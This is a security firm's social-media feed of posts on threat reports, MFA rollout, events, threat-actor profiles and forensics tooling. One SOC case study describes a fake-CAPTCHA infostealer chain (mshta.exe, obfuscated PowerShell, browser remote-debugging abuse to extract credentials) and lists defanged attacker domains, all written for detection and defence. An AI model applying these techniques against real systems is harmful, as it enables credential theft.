Mastodawn

Last week, ENISA released its Threat Landscape 2025.

It offers a detailed look at how Europe’s cyber ecosystem is evolving. The picture that emerges shows growing strain, where interconnected systems and persistent threats keep testing resilience.

Among the developments: faketivism blurring lines between actors, phishing services lowering barriers, and AI reshaping how attacks unfold.

📄 Read the report here: https://www.enisa.europa.eu/publications/enisa-threat-landscape-2025

ENISA Threat Landscape 2025 | ENISA

ENISA is the EU agency dedicated to enhancing cybersecurity in Europe. They offer guidance, tools, and resources to safeguard citizens and businesses from cyber threats.

Hunt & Hackett Aug 21, 2025

🔐 New #blogpost

At H2, we recently moved from authenticator apps to #YubiKey (FIDO2) for company-wide MFA in Entra ID.

Why? Because it enables phishing-resistant, passwordless sign-ins at scale, raising the bar for our security.

But this move didn't come without its challenges. Read about our journey here: https://www.huntandhackett.com/blog/raising-security-with-yubikey

Raising security with organization-wide YubiKey (FIDO2) in Entra ID

Find out how Hunt & Hackett transforms incident response challenges into scalable solutions using open-source software and a DevOps mindset.

Hunt & Hackett Aug 14, 2025

Cyber espionage reaches far beyond governments, it impacts more organisations than you think.

At our next CyberConnect on Sept 9 in The Hague, we’ll share real investigations, explain why even low-profile orgs are targeted, and give a live demo on tracking campaigns.

Seats are limited. Sign up today: https://www.huntandhackett.com/understanding-cyber-espionage

#CyberSecurity #ThreatIntelligence #CyberEspionage

Hunt & Hackett Jul 10, 2025

⚠️ The Hacker News just spotlighted a growing threat: SEO poisoning campaigns delivering malware through fake tool websites.

Attackers are mimicking trusted apps like PuTTY, Zoom, and ChatGPT, pushing them high in search results. Over 8,500 SMB users were targeted in just four months.

The article breaks it down clearly. If you haven’t read it yet, it’s worth your time.

Read it here: https://thehackernews.com/2025/07/seo-poisoning-campaign-targets-8500.html

SEO Poisoning Campaign Targets 8,500+ SMB Users with Malware Disguised as AI Tools

SEO poisoning delivers trojanized tools, targeting SMBs and spreading malware via fake websites

The Hacker News

Hunt & Hackett Jul 9, 2025

👤Threat Actor Profile: Sandworm

Linked to Russia’s GRU and active in 60+ countries, Sandworm targets critical infrastructure with sabotage, espionage, and disruption. 🇷🇺

🔗 Curious to learn more about this APT? Explore their threat profile in our Members' Portal: https://www.huntandhackett.com/members/actors/sandworm

🔗 Not a Member yet? Sign-up today: https://www.huntandhackett.com/members/register

Hunt & Hackett Jul 4, 2025

🚨New #blogpost: This week we're unpacking our journey of using open-source software to build an innovative cloud-based IR lab from scratch, highlighting key obstacles we encountered along the road and explaining how we transformed these into opportunities.

We share:
🔶 Velociraptor + Dissect hiccups;
🔶 Misinterpretation of IPv6 addresses in Linux UTMP logs;
🔶 Enhancing Timesketch for large scale investigations.

🔗 https://www.huntandhackett.com/blog/turning-incident-response-challenges-into-scalable-solutions

Turning incident response challenges into scalable solutions

Find out how Hunt & Hackett transforms incident response challenges into scalable solutions using open-source software and a DevOps mindset.

Hunt & Hackett Jun 5, 2025

Launching #DetectionsFromTheSOC 🚀

We're excited to announce our new series, 𝘋𝘦𝘵𝘦𝘤𝘵𝘪𝘰𝘯𝘴 𝘧𝘳𝘰𝘮 𝘵𝘩𝘦 𝘚𝘖𝘊, in which we share a behind-the-scenes look of how our SOC detects, investigates, and responds to real-world threats.

Case #1: Infostealer via fake CAPTCHA

We intercepted an attack where the intruder didn’t break in, but logged in. The entry point? A fake “I’m not a robot” CAPTCHA prompt.

👉 Want to read the full story? Head on over to our LinkedIn to check it out: https://www.linkedin.com/feed/update/urn:li:activity:7336321179005165568

#detectionsfromthesoc #captcha #infostealer #cryptbot #soc #bec | Hunt & Hackett

Launching #DetectionsFromTheSOC 🚀 We're happy to announce our new series, 𝘋𝘦𝘵𝘦𝘤𝘵𝘪𝘰𝘯𝘴 𝘧𝘳𝘰𝘮 𝘵𝘩𝘦 𝘚𝘖𝘊, in which we share a behind-the-scenes look of how our SOC detects, investigates, and responds to real-world threats. 𝐅𝐨𝐫 𝐨𝐮𝐫 𝐟𝐢𝐫𝐬𝐭 𝐞𝐝𝐢𝐭𝐢𝐨𝐧: 𝐢𝐧𝐟𝐨𝐬𝐭𝐞𝐚𝐥𝐞𝐫 𝐝𝐞𝐩𝐥𝐨𝐲𝐞𝐝 𝐯𝐢𝐚 𝐟𝐚𝐤𝐞 𝐂𝐚𝐩𝐭𝐜𝐡𝐚 In the middle of the night, Hunt & Hackett’s 24/7 SOC intercepted the early stages of a broader cyberattack. The attacker didn’t break in, but logged in. An endpoint was compromised using a fake #CAPTCHA page – you know, one of those “I’m not a robot” checks. Only this one tricked the user into running a command via the keyboard shortcut Win + R. That command launched a hidden process and deployed a known #infostealer, likely #Cryptbot. 𝐖𝐡𝐚𝐭 𝐡𝐚𝐩𝐩𝐞𝐧𝐞𝐝? Our SOC flagged a suspicious mshta.exe process making an outbound connection to a previously unknown domain. This quickly escalated: 👉 User was tricked into copy-pasting a command that secretly launched mshta.exe 👉 mshta.exe triggered PowerShell, which contacted additional anomalous domains and executed fileless malware 👉 PowerShell launched Chrome/Edge with the --remote-debugging-port=9203 flag – a known abuse method to extract browser credentials 👉 The process accessed files in the Downloads folder All signs pointed to credential theft and system reconnaissance. 𝐇𝐨𝐰 𝐰𝐞 𝐝𝐞𝐭𝐞𝐜𝐭𝐞𝐝 𝐢𝐭: One of our behavioural detection rules flagged: 👉 Use of mshta.exe in user context reaching unknown domains 👉Obfuscated PowerShell activity 👉Abuse of --remote-debugging-port in Chrome – a known credential-stealing tactic This combination triggered a high-confidence detection, prompting an alert at our #SOC and enabling a fast response & remediation – even at 3AM. 𝐑𝐞𝐦𝐞𝐝𝐢𝐚𝐭𝐢𝐨𝐧: 👉 Clean install of the endpoint 👉 Blocked malicious domains 👉 Revoked all sessions and reset credentials This case shows how infostealers can be the first step in modern attacks, giving threat actors access to credentials, browser sessions, and local files. From there, they can move laterally, escalate privileges, and pave the way for bigger attacks like ransomware or business email compromise (#BEC) without you knowing it. In short: infostealers are a launchpad for full-scale breaches. 𝐈𝐎𝐂𝐬: 👾 hxxps[:]//afliam[.]shop 👾 b[.]watchcollision[.]xyz 👾 blisspicks[.]shop

Hunt & Hackett Jun 4, 2025

🎤 We’re proud to sponsor and speak at Hague TIX on June 10!

The event is a focused gathering of Europe’s top threat intelligence minds.

We'll explore Europe’s path to cyber resilience and strategic autonomy, and dive into Lazarus and SeaTurtle operations in the Netherlands.

#CyberSecurity #ThreatIntel #HagueTIX #APT

Hunt & Hackett May 16, 2025

Our next CyberConnect session is coming up: Security in Motion!

In this session, tailored for security, IT, and risk professionals, we explore how changing geopolitical dynamics, growing technological dependencies, and new attack techniques are raising the bar for digital resilience.

Visit our website for more information, and to sign-up: https://www.huntandhackett.com/security-in-beweging

Security in beweging | Hunt & Hackett

Ontdek hoe geopolitieke spanningen, technologische afhankelijkheden en veranderende aanvalstechnieken de eisen aan digitale weerbaarheid verhogen.

Hunt & Hackett May 15, 2025

🚨 New blog!

In it, we dive into reverse-engineering AFD.sys (a hidden part of Windows networking) to surface live socket data from other processes. This unlocks new capabilities for forensics, debugging, and reverse engineering.

📃 Read it here: https://www.huntandhackett.com/blog/improving_afd_socket_visibility

🔧 Explore our tool: https://github.com/huntandhackett/AfdSocketViewer

Improving AFD Socket Visibility for Windows Forensics & Troubleshooting

This blog post explains the basics of Ancillary Function Driver API and how it can help explore networking activity on Windows systems.